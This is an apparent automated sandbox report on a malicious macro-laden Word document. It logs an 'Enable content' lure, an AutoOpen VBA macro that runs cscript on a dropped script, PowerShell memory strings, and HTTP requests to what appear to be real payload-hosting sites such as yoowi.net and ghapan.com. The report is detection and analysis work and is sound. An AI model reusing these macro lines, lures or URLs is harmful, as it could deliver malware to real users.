                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.ne
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwd
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/1
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.html
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPE
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmpJump to behavior
                Source: unknownDNS traffic detected: queries for: ghapan.com
                Source: global trafficHTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
                Source: global trafficHTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" 0 Page, I of I Words
                Source: Screenshot number: 4Screenshot OCR: Enable content" 0 Page, I of I Words: 0 N@m 13 ;a 10096 G) FI G) ,, . I lm=lk E ' 0
                Source: Screenshot number: 8Screenshot OCR: Enable content" Ru 71)11 qllnn|| n$m RunDLL m" RunDLL ,0 There was a problem starting C:\Progr
                Source: Document image extraction number: 0Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
                Source: Document image extraction number: 0Screenshot OCR: Enable content"
                Source: Document image extraction number: 1Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
                Source: Document image extraction number: 1Screenshot OCR: Enable content"
                Source: Screenshot number: 12Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" RunDLL |~| ,:Q, There was
                Source: Screenshot number: 12Screenshot OCR: Enable content" RunDLL |~| ,:Q, There was a problem starting C:\ProgramOata\www1.dll " C:\Program
                Document contains an embedded VBA macro which may execute processesShow sources
                Source: sample.doc.docOLE, VBA macro line: h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
                Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function eFile, API IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0")Name: eFile
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
                Document contains OLE streams with names of living off the land binariesShow sources
                Source: sample.doc.docStream path 'Macros/deutsche/o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM.*..................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+*..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
                Source: ~DF77272A7F6F18B150.TMP.0.drStream path 'deutsche/o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM.*..................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+*..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
                Source: ~DF26415DDA42946BBE.TMP.0.drStream path 'o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM.*..................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+*..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
                Document contains an embedded VBA with base64 encoded stringsShow sources
                Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function eFile, String ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
                Document contains an embedded VBA macro with suspicious stringsShow sources
                Source: sample.doc.docOLE, VBA macro line: RO = Environ("USERPROFILE") & "\AppData\Roaming\"
                Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function eFile, String environ: RO = Environ("USERPROFILE") & "\AppData\Roaming\"Name: eFile
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Environ_1_(jbxline, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Static jbxtresh_Environ As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Environ < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLog "api:" & jbxline & ":Environ"
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Environ_1_ = Environ(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Environ < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: jbxtresh_Environ = jbxtresh_Environ + 1
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Environ_1_
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: RO = JbxHook_Environ_1_(20, "USERPROFILE") & "\AppData\Roaming\"
                Document contains an embedded macro with GUI obfuscationShow sources
                Source: sample.doc.docStream path 'Macros/deutsche/o' : Found suspicious string wscript.shell in non macro stream
                Source: sample.doc.doc, type: SAMPLEMatched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drOLE indicator application name: unknown
                Source: ~DFE56B344EF3200177.TMP.0.drOLE indicator application name: unknown
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE indicator application name: unknown
                Source: ~DF26415DDA42946BBE.TMP.0.drOLE indicator application name: unknown
                Source: sample.doc.docOLE, VBA macro line: Sub AutoOpen()
                Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE, VBA macro line: Set docNow = JbxHook_Open_1__ob_set(31, Documents, .SelectedItems(lr))
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~DFE56B344EF3200177.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~DF26415DDA42946BBE.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drOLE indicator has summary info: false
                Source: ~DFE56B344EF3200177.TMP.0.drOLE indicator has summary info: false
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE indicator has summary info: false
                Source: ~DF26415DDA42946BBE.TMP.0.drOLE indicator has summary info: false
                Source: sample.doc.docOLE indicator, VBA macros: true
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE indicator, VBA macros: true
                Source: sample.doc.docVirustotal: Detection: 50%
                Source: sample.doc.docReversingLabs: Detection: 60%
                Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......#.................4.....0.........4......./.....`I1........v.....................K8.....................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................/.k......................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......n.e.d. .a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...0................=U.....>.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................/.k......................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v....(.......0................=U.....".......................Jump to behavior
